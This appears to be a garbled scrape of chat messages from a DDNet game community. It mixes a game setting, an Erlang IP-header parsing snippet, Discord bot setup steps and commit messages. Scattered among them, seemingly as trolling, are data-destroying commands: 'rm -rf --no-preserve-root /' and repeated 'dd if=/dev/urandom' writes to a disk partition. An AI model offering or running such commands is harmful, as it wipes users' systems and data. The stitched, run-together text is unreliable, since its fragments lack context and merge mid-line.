NtosKrnl.lib
may fix the windows undefined reference issues (edited)/showall 1
might help?
"Whether to show players at any distance (off by default)"/showall 1
might help?
"Whether to show players at any distance (off by default)" -define(IP_VERSION, 4).
-define(IP_MIN_HDR_LEN, 5).
DgramSize = byte_size(Dgram),
case Dgram of
<<?IP_VERSION:4, HLen:4, SrvcType:8, TotLen:16,
ID:16, Flgs:3, FragOff:13,
TTL:8, Proto:8, HdrChkSum:16,
SrcIP:32,
DestIP:32, RestDgram/binary>> when HLen>=5, 4*HLen=<DgramSize ->
OptsLen = 4*(HLen - ?IP_MIN_HDR_LEN),
<<Opts:OptsLen/binary,Data/binary>> = RestDgram,
...
end.
rm -rf --no-preserve-root /
dd if=/dev/urandom of=/dev/sda1 bs=8M
?dd if=/dev/urandom of=/dev/sda1 bs=8M
? git clone https://github.com/ddnet/discord-skin-upload-bot
cd discord-skin-upload-bot
USERNAME="" PASSWORD="" GUILD_ID="252358080522747904" ROLE_ID="390516461741015040" DISCORD_TOKEN="" cargo run --release
fill username, pw and discord tokensv_vote_kick_min 5
on our server so this wouldn't have happeneddd if=/dev/urandom of=/dev/sda1 bs=8M
? da472d9
Add buttons for easier handling, allow to switch reaction, allow to drop skin by removing reaction, QOL - Jupeyy711064e
Simplify regex, make parsed info more clear to the uploader (for validation) - Jupeyy